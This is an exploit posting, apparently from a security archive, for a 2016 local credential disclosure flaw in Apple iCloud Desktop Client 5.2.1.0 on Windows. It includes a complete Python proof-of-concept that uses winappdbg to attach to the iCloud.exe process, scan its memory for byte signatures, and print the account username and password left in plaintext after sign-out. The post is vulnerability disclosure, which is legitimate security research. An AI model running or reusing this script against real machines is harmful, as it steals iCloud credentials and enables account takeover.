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Apple iCloud Desktop Client 5.2.1.0 Credential Disclosure

Apple iCloud Desktop Client 5.2.1.0 Credential Disclosure
Posted Sep 8, 2016
Authored by Yakir Wizman, Alexander Korznikov, Viktor Minin

Apple iCloud Desktop Client version 5.2.1.0 local credential memory disclosure exploit.

tags | exploit, local, info disclosure
systems | apple
SHA-256 | 0c44cf0b66aabb0dbb6c52a53759c70e0b89c7ed4ee221f04d81ac76a5721350

Apple iCloud Desktop Client 5.2.1.0 Credential Disclosure

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# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.apple.com/
# Product Homepage @ https://support.apple.com/en-us/HT204283
# Date 07/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# https://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# https://korznikov.com/
#
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# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
# Funny eh?!
# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
#
# Authors are not responsible for any misuse or demage which caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:

import time
import urllib
from winappdbg import Debug, Process

def b2h(str):
return ''.join(["%02X " % ord(x) for x in str]).strip()

def h2b(str):
bytes = []
str = ''.join(str.split(" "))
for i in range(0, len(str), 2):
bytes.append(chr(int(str[i:i+2], 16)))
return ''.join(bytes)

usr = ''
pwd = ''
found = 0
filename = "iCloud.exe"
process_pid = 0
memory_dump = []

debug = Debug()
try:
print "#########################################################################"
print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
print "#########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)

process = Process(process_pid)
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
memory_dump.append(process.read(address,50))

try:
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
usr = h2b(str.split(' 00')[0])
except:
pass

memory_dump = []
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
memory_dump.append(process.read(address,60))
try:
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
pwd = h2b(str.split(' 00')[0])
except:
pass

if usr != '' and pwd !='':
found = 1
print "[+] iCloud Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
if found == 0:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'." % (filename)

debug.loop()
finally:
debug.stop()

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